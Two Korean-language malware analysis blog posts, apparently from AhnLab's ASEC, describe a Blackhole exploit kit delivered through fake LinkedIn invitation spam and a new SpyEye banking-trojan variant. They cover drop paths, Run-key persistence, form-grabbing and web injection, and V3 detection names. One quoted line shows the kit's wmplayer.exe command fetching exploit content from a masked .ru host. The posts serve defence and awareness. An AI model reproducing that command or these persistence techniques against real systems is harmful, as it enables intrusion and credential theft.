ASEC에서는 6월 5일 웹 익스플로잇 툴킷(Web Exploit Toolkit)의 일종인 블랙홀(Blackhole) 웹 익스플로잇 툴 킷이 스팸 메일(Spam Mail)과 결합되어 유포되었다는 사실을 밝힌 바가 있다.


금일 블랙홀 웹 익스플로잇 툴 킷과 결합된 스팸 메일이 다시 발견되었으며, 이 번에 발견된 스팸 메일은 사용자가 많은 유명 소셜 네트워크(Social Network) 서비스인 링크드인(LinkedIn)의 초대 메일로 위장하여 유포되었다.


이 번에 발견된 링크드인 스팸 메일과 결합된 형태로 유포된 블랙홀 웹 익스플로잇 툴킷은 아래 이미지와 같이 다양한 취약점들을 악용하고 있으며 최종적으로 감염된 PC에서 사용자 정보들을 탈취하기 위한 악성코드 감염을 목적으로 하고 있다.



링크드인의 초대 메일로 위장해 유포된 스팸 메일은 아래 이미지와 같은 형태를 가지고 있으며, [Accept] 부분은 정상적인 링크드인 웹 페이지로 연결되는 것이 아니라 중국에 위치한 특정 시스템으로 연결되도록 구성되어 있다.



해당 [Accept] 부분을 클릭하게 되면 중국에 위치한 특정 시스템으로 접속하며, PC 사용자에게는 아래와 같은 이미지를 보여주게 된다.



그러나 실제 해당 웹 페이지 하단에는 아래 이미지와 같이 웹 페이지 하단에는 다른 러시아에 위치한 시스템으로 연결되는 자바 스크립트 코드가 인코딩 되어 있다.



해당 자바 스크립트 코드를 디코딩하게 되면 아래 이미지와 같이 iFrame 으로 처리된 코드가 나타나며, 사용자 모르게 러시아에 위치한 블랙홀 웹 익스플로잇 툴킷이 설치되어 있는 시스템으로 연결하게 된다.



해당 블랙홀 웹 익스플로잇 툴킷에 성공적으로 연결하게 되면 웹 브라우저에 의해 CMD 명령으로 윈도우 미디어 플레이(Windows Media Player) 취약점을 악용하기 위한 시도를 하게 된다. 그러나 분석 당시 해당 취약점은 정상적으로 악용되지 않았다.


"C:\Program Files\Windows Media Player\wmplayer.exe" /open http://************.ru:8080/forum/data/hcp_asx.php?f=182b5"


그리고 두 번째로 자바(JAVA)와 인터넷 익스플로러(Internet Explorer)에 존재하는 알려진 취약점을 악용하기 위한 스크립트 파일이 실행된다.



세 번째로 어도비 아크로뱃 리더(Adobe Acrobat Reader)에 존재하는 알려진 취약점을 악용하기 위한 PDF 파일을 아래 이미지와 같이 다운로드 후 실행 하게 된다.



해당 링크드인 스팸 메일을 수신한 PC에 위에서 언급한 4개의 취약점 중 하나라도 존재 할 경우에는 동일한 시스템에서 wpbt0.dll (127,648 바이트)를 다운로드하여 다음 경로에 생성하게 된다.


C:\Documents and Settings\Tester\Local Settings\Temp\wpbt0.dll


그리고 생성된 wpbt0.dll (127,648 바이트) 는 다시 자신의 복사본을 아래 경로에 KB01458289.exe (127,648 바이트)라를 명칭으로 복사하게 된다.


C:\Documents and Settings\Tester\Application Data\KB01458289.exe


감염된 PC의 레지스트리에 다음 키 값을 생성하여 PC가 재부팅 할 때마다 자동 실행 되도록 구성하였다.


HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\

KB01458289.exe = C:\Documents and Settings\Tester\Application Data\KB01458289.exe


그리고 감염된 PC에서 실행 중인 모든 정상 프로세스의 스레드로 자신의 코드 일부분을 삽입한 후 다음의 정보들을 후킹하게 된다.


웹 사이트 접속 정보

FTP 시스템 접속 사용자 계정과 비밀 번호 정보

POP3 이용 프로그램 사용자 계정과 비밀 번호 정보

웹 폼 변조(Formgrabber) 및 웹 폼 인젝션 (httpinjects)으로 웹 사이트 사용자 계정과 암호 정보


감염된 PC에서 수집된 정보들 모두는 아래 이미지와 같이 악성코드 내부에 하드코딩 되어 있는 특정 시스템들으로 후킹한 데이터들 전부를 인코딩하여 전송하게 된다.



그리고 마지막으로 감염된 PC 사용자에게는 아래 웹 페이지와 같이 연결을 시도한 웹 페이지를 보여주어 정상적인 접속이 실패한 것으로 위장하게 된다.



이 번에 발견된 링크드인 스팸 메일과 결합된 블랙홀 웹 익스플로잇 툴킷에서 유포한 악성코드들은 V3 제품군에서 모두 다음과 같이 진단한다.


JS/Iframe

Packed/Win32.Krap

PDF/Exploit
JS/Exploit

링크드인 스팸 메일과 결합된 블랙홀 웹 익스플로잇 툴킷에서 유포를 시도한 악성코드는 기존에 발견된 온라인 뱅킹 정보 탈취를 목적으로하는 제우스(Zeus) 또는 스파이아이(SpyEye)와 유사한 웹 폼 변조(Formgrabber) 및 웹 폼 인젝션 (httpinjects) 기능으로 웹 사이트 사용자 계정과 암호 정보를 탈취 할 수 있다.


이는 악성코드 유포자가 의도하는 대부분의 웹 사이트들에서 사용자 계정과 비밀 번호 정보를 탈취 할 수 있음으로, 단순 스팸 메일로 판단되더라도 송신자가 불명확한 메일에 포함된 웹 사이트 연결 링크를 클릭하지 않는 주의가 필요하다.

저작자 표시
신고
Creative Commons License
Creative Commons License
Posted by 비회원

ASEC에서는 4월 4일 온라인 뱅킹 정보 탈취를 위해 제작된 스파이아이(SpyEye) 트로이목마가 이제는 온라인 뱅킹외에 다양한 국가에 위치한 다양한 산업군의 웹 사이트들에서 사용자 계정 정보들의 탈취를 노린다는 정보를 전달한 바가 있다.


이러한 스파이아이 트로이목마가 감염 형태가 기존에 발견되었던 스파이아이 변형들과 다른 새로운 형태의 스파이아이 변형이 발견되었다.


이 번에 발견된 스파아이 트로이목마는 전체적인 동작면에서는 기본적으로 동일한 것으로 미루어 현재까지 언더그라운드에 공개된 다양한 온라인 뱅킹 정보 탈취 트로이목마들의 소스코드 중 스파이아이의 소스코드를 사용된 것으로 추정된다.


추가적으로 ASEC에서는 2012년 5월 중순부터 해당 새로운 스파이아이 트로이목마 변형이 유포되기 시작한 것으로 추정되며, 그리고 웹 익스플로잇 툴킷(Web Exploit Toolkit)의 한 종류인 블랙홀 익스플로잇 툴킷(Blackhole Exploit Toolkit)에 의해 유포된 것으로 추정하고 있다.


해당 스파이아이 트로이목마에 감염되면 감염된 시스템에서 실행 중인 정상 윈도우 시스템 파일 explorer.exe의 프라이빗 메모리(Private Memory) 영역에 자신의 코드 16,384 바이트를 삽입하게 된다.



정상적으로 explorer.exe의 메모리 영역에 자신의코드가 삽입되면 자신의 복사본을 다음 경로에 설정 파일과 함께 생성하나, 기존 스파이아이 변형들처럼 유저 모드(User Mode)의 은폐 기능을 수행하지는 않는다.


C:\Documents and Settings\All Users\Application Data\default\bin.exe


다음 레지스트리 키(Registry Key)를 생성하여 윈도우 시스템이 재부팅되어도 자동 실행되도록 구성한다.


HKCU\Software\Microsoft\Windows\CurrentVersion\Run\default

"C:\Documents and Settings\All Users\Application Data\default\bin.exe"


그리고 독일에 위치한 C&C 서버와 암호화된 통신을 통하여 별도의 설정 파일인 web.dat을 아래의 경로에 생성하게 된다.


C:\Documents and Settings\All Users\Application Data\default\web.dat 

C:\Documents and Settings\All Users\Application Data\default\cfg.dat


생성된 설정 파일은 RC4로 인코딩되어 있으며, 이를 디코딩하는 키값은 해당 스파이아이 트로이목마 내부에 가지고 있으며, 생성된 설정 파일을 디코딩하게 되면 아래 이미지와 같은 텍스트 파일이 나타나게 된다.



해당 설정 파일에는 아래 이미지와 같은 독일에 위치한 은행의 온라인 뱅킹 웹 사이트의 로그인을 위한 사용자 계정과 암호를 후킹하기 위한 코드가 설정되어 있다. 



이 외에 이번에 발견된 스파이아이 변형은 웹 폼 인젝션(Web Form Injection)을 위해 마이크로소프트 인터넷 익스플로러(Internet Explorer), 구글 크롬(Google Chrome)과 파이어폭스(Firefox) 웹 브라우저 실행 여부를 확인하고 접속하는 웹 사이트 주소를 확인하게 된다.


그리고 파이어폭스의 사용자 설정 파일인 user.js 을 확인하여 아래 이미지와 같은 코드를 삽입하여, 파이어폭스에 포함되어 있는 보안 경고 기능을 무력화 하게 된다.



이 번에 발견된 스파이아이 변형은 전체적인 감염 동작은 기존에 발견된 스파이아이 변형들과 동일하게 정상 explorer.exe 의 메모리 영역에 자신의 코드를 삽입하고, 웹 브라우저가 접속하는 웹 사이트 주소를 설정 파일과 비교하여 웹폼 인젝션을 통해 사용자 계정과 암호를 후킹하는 것은 동일하다. 


그러나 기존 스파이아이 변형들이 가지고 있는 유저 모드 은폐 기능을 통해 생성한 파일 복사본과 설정 파일들을 은폐하는 기능이 존재하지 않는 차이점만을 가지고 있다.


이 번에 발견된 스파이아이의 새로운 변형은 V3 제품군에서 다음과 같이 진단한다.


Win-Trojan/Spyeyes.19968.B


저작자 표시
신고
Creative Commons License
Creative Commons License
Posted by 비회원